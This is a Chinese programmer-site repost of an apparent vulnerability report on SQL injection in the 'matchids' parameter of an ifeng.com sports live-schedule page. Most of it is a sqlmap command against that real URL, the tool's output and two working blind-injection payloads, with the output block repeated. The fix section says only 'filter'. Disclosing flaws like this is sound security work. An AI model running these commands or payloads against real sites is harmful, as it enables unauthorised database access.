欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  数据库

凤凰网体育直播间一处SQL注入_MySQL

程序员文章站 2024-01-02 15:40:22
...
凤凰网体育直播间一处SQL注入

sqlmap.py -u "http://live.sports.ifeng.com/sports/schedule.php?format=js&matchids=“ 过滤不严导致注入。

G:/python/sqlmap>sqlmap.py -u "http://live.sports.ifeng.com/sports/schedule.php?

format=js&matchids="

sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program

[*] starting at 00:48:09

[00:48:09] [WARNING] using 'C:/Documents and Settings/mm/.sqlmap/output' as the

output directory

[00:48:09] [INFO] resuming back-end DBMS 'mysql'

[00:48:09] [INFO] testing connection to the target URL

sqlmap got a 302 redirect to 'http://www.ifeng.com'. Do you want to follow? [Y/n

] y

[00:48:14] [INFO] heuristics detected web page charset 'ISO-8859-2'

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: matchids

Type: boolean-based blind

Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)

Payload: format=js&matchids=-5547 OR (5410=5410)#

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 OR time-based blind

Payload: format=js&matchids=-5830 OR 5843=SLEEP(5)

---

[00:48:20] [INFO] the back-end DBMS is MySQL

web application technology: Nginx

back-end DBMS: MySQL 5.0.11

sqlmap.py -u "http://live.sports.ifeng.com/sports/schedule.php?format=js&matchids=“

Place: GET

Parameter: matchids

Type: boolean-based blind

Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)

Payload: format=js&matchids=-5547 OR (5410=5410)#

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 OR time-based blind

Payload: format=js&matchids=-5830 OR 5843=SLEEP(5)

---

修复方案:

过滤。

上一篇:

下一篇: